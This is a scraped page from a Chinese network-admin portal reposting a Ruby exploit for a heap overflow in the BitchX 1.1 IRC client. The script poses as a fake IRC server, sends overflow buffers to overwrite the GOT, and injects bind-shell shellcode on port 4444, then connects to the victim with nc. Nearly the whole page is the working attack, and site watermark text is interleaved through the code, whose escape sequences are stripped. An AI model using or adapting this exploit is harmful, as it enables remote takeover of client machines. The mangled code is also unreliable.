| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
require 'socket'
中国网管联盟bitsCN.com
#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"x6ax02x58xcdx80x85xc0x74x05x6ax01x58xcdx80"+ 网管联盟bitsCN@com
#metasploit linux x86 shellcode bind tcp port 4444
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xfc"+
"x98xd8xb8x83xebxfcxe2xf4xcdx43x8bxfbxafxf2xdaxd2"+
"x9axc0x41x31x1dx55x58x2exbfxcaxbexd0xedxc4xbexeb"+
"x75x79xb2xdexa4xc8x89xeex75x79x15x38x4cxfex09x5b"+
"x31x18x8axeaxaaxdbx51x59x4cxfex15x38x6fxf2xdaxe1"+
"x4cxa7x15x38xb5xe1x21x08xf7xcaxb0x97xd3xebxb0xd0"+
"xd3xfaxb1xd6x75x7bx8axebx75x79x15x38" 网管有家www.bitscn.net
网管网www.bitscn.com
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
ret = (targets['linux 2.6 Hardened (FC6)'].hex) 网管有家bitscn.net
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------" 网管u家www.bitscn.net
puts "n[-] listening for incoming clients..."
网管u家bitscn.net
while (client = sock.accept)
ip = client.peeraddr 网管网www_bitscn_com
buffer = client.gets
puts "[<] #{buffer}"
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
网管网www.bitscn.com
#Fake server reply to connection
buffer = ":#{nick} MODE #{nick} :+iwrn"+
":0 001 #{nick} :biznitch-1.0rn"+
":5 002 #{nick} :biznitch-1.0rn"+
":6 003 #{nick} :arn"+
":aaa 004 #{nick} :arn"+
":aaa 005 #{nick} :arn"+
":aaa 251 #{nick} :arn"+
":aaa 252 #{nick} :arn"+
":aaa 253 #{nick} :arn"+
":aaa 254 #{nick} :arn"+
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
网管朋友网www_bitscn_net
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "rn"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "x90" * 40
evilbuf<< "rn"
for i in 0..5
client.send(evilbuf, 0)
end
网管网www.bitscn.com
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...nn"
网管u家bitscn.net
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end
网管论坛bbs_bitsCN_com
|
0
|
评论加载中…